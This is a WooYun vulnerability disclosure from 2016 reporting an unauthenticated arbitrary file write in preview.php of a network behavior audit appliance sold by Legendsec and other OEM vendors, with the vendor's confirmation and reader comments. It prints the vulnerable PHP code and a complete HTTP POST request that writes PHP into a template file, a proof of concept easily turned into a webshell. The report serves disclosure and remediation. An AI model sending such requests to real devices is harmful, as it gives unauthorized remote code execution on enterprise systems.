当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(31) 关注此漏洞

缺陷编号: WooYun-2016-171016

漏洞标题: 某网上行为(审计)设备系统通用型getshell(无需登录涉及网神&网御星云等厂商)

相关厂商: 网神信息技术(北京)股份有限公司

漏洞作者: Ano_Tom认证白帽子

提交时间: 2016-01-19 09:14

公开时间: 2016-04-11 16:08

漏洞类型: 网络未授权访问

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 任意命令执行

1人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-19: 细节已通知厂商并且等待厂商处理中
2016-01-23: 厂商已经确认,细节仅向厂商公开
2016-01-26: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-03-18: 细节向核心白帽子及相关领域专家公开
2016-03-28: 细节向普通白帽子公开
2016-04-07: 细节向实习白帽子公开
2016-04-11: 细节向公众公开

简要描述:

感觉网神公司棒棒嗒,提交漏洞还会有礼物。这次的漏洞影响多个厂商,网神科技也受到影响,就以网神科技为代表。

详细说明:

在根目录下preview.php文件具有任意内容写入的漏洞,可以直接写入shell。

code 区域
if(isset($_POST['previewtxt']))
{
$index = $_POST['previewtxt'];
$index = str_replace("&lt;","<",$index);
$index = str_replace("&gt;",">",$index);
$index = stripslashes($index);

$fp = fopen("/usr/hddocs/nsg/template/___index.php","w");
fwrite($fp,$index);
fclose($fp);
require_once("/usr/hddocs/nsg/head_index.php");
require_once("/usr/hddocs/nsg/template/___index.php");
}



写入的文件地址为template/___index.php。

漏洞证明:

网神科技的设备

code 区域
网神
POST /preview.php HTTP/1.1
Host: **.**.**.**:8443
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=8b7bf4198d6bccbe7d68fedf3f8287cc
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

previewtxt=<?php phpinfo();?>





A7DA357A-037E-4C6E-943A-F1F870BBD998.png







此设备使用量还是挺多的,并且都是企业级用户,此外附上网御星云的一个案例和zoomeye搜索截图,其它同ODM的厂商的案例不一一列举。

code 区域
**.**.**.**:8443



9EA3544E-A986-4FA6-BC3C-1E8AE8985A1B.png

修复方案:

这个文件存在的价值就不明白呢,加访问权限吧。推动用户修复还是比较重要的,毕竟都是企业级用户。

版权声明:转载请注明来源 Ano_Tom@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-23 05:55

厂商回复:

感谢白帽子提交的漏洞,经过核实该问题确实存在,目前相关人员正在分析解决该问题,我们后续将努力提升产品安全,服务好用户。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2016-01-19 09:27 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    感觉都是o一个?

  2. 2016-01-19 09:30 | YY-2012 ( 核心白帽子 | Rank:3726 漏洞数:717 | 意淫,是《红楼梦》原创的词汇,但后来演变...)
    0

    @xsser 你猜

  3. 2016-01-19 09:59 | pyphrb ( 实习白帽子 | Rank:53 漏洞数:8 | ...........................................)
    0

    @YY-2012 都是买第三方的

登录后才能发表评论,请先 登录